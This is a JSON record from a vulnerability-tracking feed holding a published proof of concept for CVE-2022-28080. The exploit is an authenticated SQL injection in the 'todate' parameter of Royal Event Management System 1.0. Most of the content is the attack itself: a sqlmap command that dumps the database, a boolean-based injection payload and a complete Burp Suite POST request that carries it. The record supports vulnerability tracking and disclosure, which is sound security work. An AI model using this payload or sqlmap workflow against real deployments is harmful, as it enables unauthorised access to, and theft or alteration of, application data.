{"uuid": "8faa9ede-e068-4fde-b0c0-bbb76ea85d15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-28080", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/53211", "content": "Exploit Collector\nRoyal Event Management System 1.0 SQL Injection\n\nhttps://2.bp.blogspot.com/-KCLJyqafybo/WWlvfwHA-LI/AAAAAAAAIQI/MCuUzFpEyfsyWr-64Egm7HXW4FQP4atdgCLcBGAs/s1600/h88.png \nRoyal Event Management System version 1.0 suffers from a remote SQL injection vulnerability.\n\nSHA-256 | 884c0f6e25d5c7878c15b69a5867168b87afcc090d923b7b1d8d3da4f3da329d\n\nDownload\n# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)\n# Date: 2022-26-03\n# Exploit Author: Eren Gozaydin\n# Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip\n# Version: 1.0\n# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51\n# CVE: CVE-2022-28080\n# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080\n\n------------------------------------------------------------------------------------\n\n1. Description:\n----------------------\n\nRoyal Event Management System 1.0 allows SQL Injection via parameter 'todate' in\n/royal_event/btndates_report.php#?=  Exploiting this issue could allow an attacker to compromise\nthe application, access or modify data, or exploit latent vulnerabilities\nin the underlying database.\n2. Proof of Concept:\n----------------------\n\nIn Burpsuite intercept the request from the affected page with\n'todate' parameter and save it like poc.txt. Then run SQLmap to extract the\ndata from the database:\n\nsqlmap -r poc.txt --dbms=mysql\n3. Example payload:\n----------------------\n\n(boolean-based)\n\n-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns \n\n4. Burpsuite request:\n----------------------\n\nPOST /royal_event/btndates_report.php#?= HTTP/1.1\nHost: localhost\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-us,en;q=0.5\nCache-Control: no-cache\nContent-Length: 334\nContent-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0\nCookie: PHPSESSID=qeoe141g7guakhacf152a3i380\nReferer: http://localhost/royal_event/btndates_report.php#?=\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\n\n--f289a6438bcc45179bcd3eb7ddc555d0\nContent-Disposition: form-data; name=\"todate\"\n\n-1' OR 1=1 OR 'ns'='ns\n--f289a6438bcc45179bcd3eb7ddc555d0\nContent-Disposition: form-data; name=\"search\"\n\n3\n--f289a6438bcc45179bcd3eb7ddc555d0\nContent-Disposition: form-data; name=\"fromdate\"\n\n01/01/2011\n--f289a6438bcc45179bcd3eb7ddc555d0--\n\n\nSource:packetstormsecurity.com", "creation_timestamp": "2026-09-06T00:00:16.372806Z"}